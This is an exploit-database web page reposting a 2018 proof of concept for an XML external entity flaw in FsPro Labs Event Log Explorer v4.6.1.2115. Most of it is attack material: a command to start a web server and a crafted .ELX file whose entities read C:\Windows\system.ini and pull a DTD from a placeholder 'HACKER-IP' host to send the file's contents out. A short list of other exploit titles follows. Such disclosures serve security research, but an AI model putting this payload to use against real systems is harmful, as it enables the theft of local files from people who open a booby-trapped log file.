Fspro labs event log explorer v4.6.1.2115 xml external entity injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-09-03 | Type : webapps | Platform : windows
This exploit / vulnerability Fspro labs event log explorer v4.6.1.2115 xml external entity injection is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Title: FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection
# Author: hyp3rlinx
# Date: 2018-09-01
# Vendor: www.eventlogxp.com
# Software: https://eventlogxp.com/download.php
# Affected Component: elex.exe
# CVE: N/A

# Description:
# Upon opening a specially crafted .ELX file in Event Log Explorer, remote attackers
# can potentially gain access to local files.

# PoC
python -m SimpleHTTPServer

"test.elx"

<?xml version="1.0"?>
<!DOCTYPE gga [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://HACKER-IP:8000/payload.dtd">
%dtd;]>
<infodisclosa>&send;</infodisclosa>

Fspro labs event log explorer v4.6.1.2115 xml external entity injection


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Fspro labs event log explorer v4.6.1.2115 xml external entity injection Vulnerability / Exploit